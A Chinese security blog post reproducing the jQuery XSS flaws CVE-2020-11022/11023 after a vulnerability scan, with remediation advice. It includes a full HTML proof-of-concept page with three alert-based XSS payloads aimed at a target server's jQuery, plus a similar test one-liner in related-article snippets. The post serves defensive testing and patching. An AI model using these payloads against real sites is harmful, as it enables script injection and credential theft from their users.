【JQuery-XSS漏洞(CVE-2020-11022/CVE-2020-11023)漏洞复现】

最新推荐文章于 2024-05-17 02:52:44 发布
最新推荐文章于 2024-05-17 02:52:44 发布
阅读量1.2w 收藏 28
点赞数 10
分类专栏: 漏洞复现 文章标签: jquery xss 前端 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61872115/article/details/134142487
版权

文章目录

一、漏洞描述

进行在公司内部用nessus做漏洞扫描时,发现某台服务器报出这个中危漏洞,后面查资料复现。
根据脚本中的自我报告版本,远程web服务器上托管的JQuery版本大于或等于1.2,且在3.5.0之前。因此,它受到多个跨站点脚本漏洞的影响。

二、受影响版本

JQuery版本大于等于1.2 ,小于 3.5.0

三、漏洞复现

1、首先根据漏洞提示访问到了如下界面

http://x.x.x.x/Scripts/jquery-1.7.1.min.js

在这里插入图片描述
2、利用POC复现
利用源代码如下:

<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
    <!-- 测试JQuery -->
   <script src="http://x.x.x.x/Scripts/jquery-1.7.1.min.js"></script>
	<!-- <script src="./jquery.min.js"></script> -->
</head>
<body>
<script>
function test(n,jq){
    sanitizedHTML = document.getElementById('poc'+n).innerHTML;
    if(jq){
        $('#div').html(sanitizedHTML);
    }else{
        div.innerHTML=sanitizedHTML;
    }
}
</script>
<h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1>
<p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p>
 
<h2>PoC 1</h2>
<button onclick="test(1)">Assign to innerHTML</button> <button onclick="test(1,true)">Append via .html()</button>
<xmp id="poc1">
<style><style /><img src=x onerror=alert(2)> 
</xmp>
 
<h2>PoC 2 (Only jQuery 3.x affected)</h2>
<button onclick="test(2)">Assign to innerHTML</button> <button onclick="test(2,true)">Append via .html()</button>
<xmp id="poc2">
<img alt="<x" title="/><img src=x onerror=alert("1st")>">
</xmp>
 
<h2>PoC 3</h2>
<button onclick="test(3)">Assign to innerHTML</button> <button onclick="test(3,true)">Append via .html()</button>
<xmp id="poc3">
<option><style></option></select><img src=x onerror=alert("1st")></style>
</xmp>
 
<div id="div"></div>
</body>
</html>

在src处替换为目标路径地址即可,打开html
在这里插入图片描述

点击Append via .html(),可弹窗说明漏洞存在
在这里插入图片描述

四、漏洞危害

攻击者可以利用该漏洞执行恶意HTML/JS代码、构造蠕虫、篡改页面实施钓鱼攻击、以及诱导用户再次登录,然后获取其登录凭证等。

五、修复建议

(1)更新 jQuery 到 3.5.0 或更高版本
(2)关闭不必要的目录访问权限,如Scripts目录,仅开放提供服务的目录
(3)过滤输入的数据,对例如:“ ‘ ”,“ “ ”,” < “,” > “,” on* “,script、iframe等危险字符进行严格的检查。这里的输入不仅仅是用户可以直接交互的输入接口,也包括HTTP请求中的Cookie中的变量,HTTP请求头部中的变量等。

一纸-荒芜
关注
  • 10
    点赞
  • 28
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
复现CVE-2020-11022/11023jQuery XSS漏洞
记录并分享学习安全的知识点..
05-31 5887
警告 请勿使用本文提到的内容违反法律。 本文不提供任何担保 一、漏洞描述 由于执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。 二、影响版本 大于或等于1.2且在3.5.0之前的jQuery版本中 三、漏洞复现 poc如下: <!DOCTYPE html> <html> <head> &lt...
jQuery-with-XSS 检测jQuery版本是否存在XSS漏洞
09-29
网站中包含大量的动态内容以提高用户体验,比过去要复杂得多。所谓动态内容,就是根据用户环境和需要,Web应用程序能够输出相应的内容。动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受其影响。
解决jquery版本过低引发的XSS跨站安全漏洞
kang1011的博客
11-13 1万+
解决jquery版本过低引发的安全漏洞 测试网站是否存在XSS跨站漏洞: 以google浏览器为例,打开要测试的网站,在Console窗口输入: $.fn.jquery 回车查看版本号 $(“element[attribute=’<img src=123123 οnerrοr=alert(123)>’”); 回车之后会出现弹窗,说明存在XSS跨站漏洞 漏洞原因: 1.x系列版本等于或低于1.12的jQuery,和2.x系列版本等于或低于2.2的jQuery,过滤用户输入数据所使用的
jQuery-XSS漏洞CVE-2020-11022 CVE-2020-11023)_cve-2020-11023复现
最新发布
2401_85014040的博客
05-17 740
在大于或等于1.2且在3.5.0之前的jQuery版本中,即使执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。上面漏洞验证payload代码没有问题,有些可能由于编辑器问题,复制后有些许问题,这里我给出我本地使用的poc,大家下载修改js路径即可使用。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人**
jQuery-XSS漏洞CVE-2020-11022/CVE-2020-11023
热门推荐
1stPeak's Blog
03-25 2万+
jQuery-XSS漏洞CVE-2020-11022/CVE-2020-11023
Web安全-JQuery框架XSS漏洞浅析
道阻且长,行则将至。
01-23 1万+
文章目录框架简介漏洞简述漏洞检测漏洞复现漏洞分析漏洞复现修复建议新版漏洞漏洞复现漏洞原理修复方案漏洞验证 框架简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装 JavaScript 常用的功能代码,提供一种简便的 JavaScript 设计模式,优化 HTML 文档操作、事件处理、动画设计和 Ajax 交互。 据一项调查报告,在对 433000 个网站的分析中发现,77%的网站至少使用了一个具
安全生产:CVE-2020-11022/CVE-2020-11023漏洞解析
IT全栈 华强工作室
09-07 3524
代码安全扫描阶段,前端资源审计发现jQuery版本过低导致生产系统存在类风险。该类风险为应用安全缺陷类DXSS攻击,攻击者可以利用该漏洞注入恶意脚本代码,并在受害者的浏览器上执行。将导致受害者的个人信息泄露、账户被劫持、会话被劫持等安全问题。科运中心给出的解决方案是升级jQuery版本至3.5.0或更高版本。
jQuery框架漏洞全总结及开发建议
iokla
10-02 1万+
一、jQuery简介 jQuery是一个快速、简洁的JavaScript框架,是一个丰富的JavaScript代码库。jQuery设计的目的是为了写更少的代码,做更多的事情。它封装JavaScript常用的功能代码,提供一种简便的JavaScript设计模式,优化HTML文档操作、事件处理、动画设计和Ajax交互。 据一项调查报告,在对433,000个网站的分析中发现,77%的网站至少使用了一个具有已知安全漏洞前端JavaScript库,而jQuery位列榜首,而且远远超过其他库。但事实上这些库有可用的不
JQueryXSS攻击中的表现
甘焕的博客
11-29 1万+
前端XSS攻击中,直接运用innerHTML属性赋值,脚本绝不会被解析,代码如下:var html = '<script>alert(100)</script>'; // 里面的脚本绝不会执行,不会弹出100信息 document.body.innerHTML = html;1. $.html被轻松注入如果改用JQuery来实现,则出现了令人惊讶的结果,JS代码被轻松注入,代码如下:var h
jQuery-1.7.2任意文件读取漏洞验证利用脚本
04-27
jQuery是一个快速、简洁的JavaScript框架,丰富的Javascript代码库,在其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞,攻击者可通过前台读取任意文件。
anti-xss:AntiAntiXSS | 通过PHP防止跨站点脚本(XSS
05-02
:Japanese_secret_button: 反XSS “跨站点脚本(XSS)是一种通常在Web应用程序中发现的计算机安全漏洞XSS使攻击者能够将客户端脚本注入到其他用户查看的网页中。跨站点脚本漏洞可能被攻击者用来绕过相同原产地策略...
coldfusion-10-11-xss:CVE-2015-0345 (APSB15-07) 的概念验证代码
05-31
此存储库包含 CVE-2015-0345 (APSB15-07) 的 XSS 向量,允许在 ColdFusion 安装上获得远程命令执行。 此漏洞仅对 ColdFusion 10 和 11 安装有效。 具体来说,ColdFusion 11, Update 11 和 ColdFusion 10, Update 16...
Web渗透】jQuery是怎么形成XSS
全栈纸伞
06-28 6130
最近有人问我怎么检测jQueryXSS,之前因为有强大的扫描器,只管上报即可,没有认真的分析形成的原因。 这次真的给问倒了,于是自己搭了个环境来研究一下。 分了如下几个可能出现的问题来解决。 1、是否所有的jQuery存在XSS漏洞? 首先答案是否认的,用如下的例子来解决这个问题。 之前被误导,在网上发现这个代码,说是用来检测jQueryXSS代码。 var value = l...
jQuery导致的XSS跨站漏洞
weixin_45908624的博客
11-17 5269
jQuery导致的XSS跨站漏洞
jQuery最新xss漏洞浅析、复现、修复
qq_29365787的博客
06-08 1万+
jQuery最新xss漏洞浅析、复现、修复 1、xss漏洞的形成和危害 形成:xss漏洞也叫跨站点脚本编制,形成的原因简单说就是 应用程序未对用户可控制的输入正确进行无害化处理,就将其放置到充当 Web 页面的输出中。这可被跨站点脚本编制攻击利用。 在以下情况下会发生跨站点脚本编制 (XSS) 脆弱性: [1] 不可信数据进入 Web 应用程序,通常来自 Web 请求。 [2] Web 应用程序动态生成了包含此不可信数据的 Web 页面。 [3] 页面生成期间,应用程序不会禁止数据包含可由 Web 浏览器执
复现xss漏洞
m0_73113764的博客
09-04 372
xss漏洞
cve-2008-4834漏洞修复
09-04
对于CVE-2008-4834漏洞的修复,首先需要了解该漏洞的具体细节和影响。然后,根据漏洞的性质,可以采取以下几种方法来修复: 1. 更新软件版本:检查使用的软件或系统是否存在已知的漏洞,并及时更新到最新版本。厂商通常会发布修复补丁或安全更新来解决已知漏洞。 2. 配置安全策略:通过合理配置安全策略,如访问控制、防火墙等,限制漏洞的利用。确保只有授权的用户可以访问和操作相关资源。 3. 关闭不必要的服务:关闭不必要的网络服务或端口,减少攻击面。只保留必要的服务,并采取安全配置措施,如限制访问、加密通信等。 4. 加强身份验证:使用强密码、多因素身份验证等措施,增加用户身份验证的安全性。 5. 安全编码和输入验证:在应用程序开发过程中,采用安全编码实践和输入验证技术,避免常见的漏洞,如跨站点脚本攻击(XSS)、SQL注入等。 请注意,具体的修复方法可能因漏洞类型和受影响的软件而有所不同。建议在修复漏洞之前仔细评估和测试修复措施,确保其有效性和安全性。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一纸-荒芜

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值